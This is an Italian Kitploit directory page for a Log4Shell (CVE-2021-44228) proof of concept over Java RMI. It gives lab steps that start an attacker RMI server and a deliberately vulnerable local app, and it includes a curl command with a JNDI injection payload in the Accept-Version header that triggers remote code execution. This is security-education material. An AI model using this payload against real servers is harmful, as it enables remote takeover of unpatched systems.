Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4shell-rmi-poc — Una prova di concetto delle vulnerabilità Log4j (CVE-2021-44228) tramite Java-RMI | Kitploit
Strumenti/GitHubGitHub/labout/log4shell-rmi-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHublabout/log4shell-rmi-poc

log4shell-rmi-poc

Una prova di concetto delle vulnerabilità Log4j (CVE-2021-44228) tramite Java-RMI

Vedi Repository
844 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4shell-rmi-poc

Una prova di concetto della vulnerabilità Log4j (CVE-2021-44228) su Java-RMI
Usa Log4j 2.5.7 da spring-boot-starter-log4j2

Requisiti:

Testato con Java 8 (JDK 1.8.0_25) e Java 11 (JDK 11.0.1)

Come eseguire il POC

1. Clona il repository:

root@kitploit:~
git clone https://github.com/Labout/log4shell-rmi-poc.git

2. Avvia il server RMI dell'attaccante

root@kitploit:~
cd Log4jshell_rmi_server

./mvnw clean package

java -jar target/Log4jshell.rmi.server-0.0.1-SNAPSHOT.jar

Dovresti ottenere qualcosa del genere:

rmi server

3. Avvia l'applicazione Log4j vulnerabile (qui un'applicazione Spring Boot)

In un nuovo terminale

root@kitploit:~
cd vulnerabel_log4j_app

./mvnw clean package

java -jar target/vulnerabel_log4j_app-0.0.1-SNAPSHOT.jar

4. Inietta un JNDI vulnerabile tramite l'header "Accept-version"

root@kitploit:~
curl 'http://localhost:8080/hello' --header 'Accept-Version: ${jndi:rmi://127.0.0.1:1099/ExecByEL}'

Come puoi vedere, l'app vulnerabile richiama l'app Calcolatrice.

exploit

Riferimenti

https://www.cisecurity.org/log4j-zero-day-vulnerability-response/
https://www.lunasec.io/docs/blog/log4j-zero-day/

Scarica lo strumento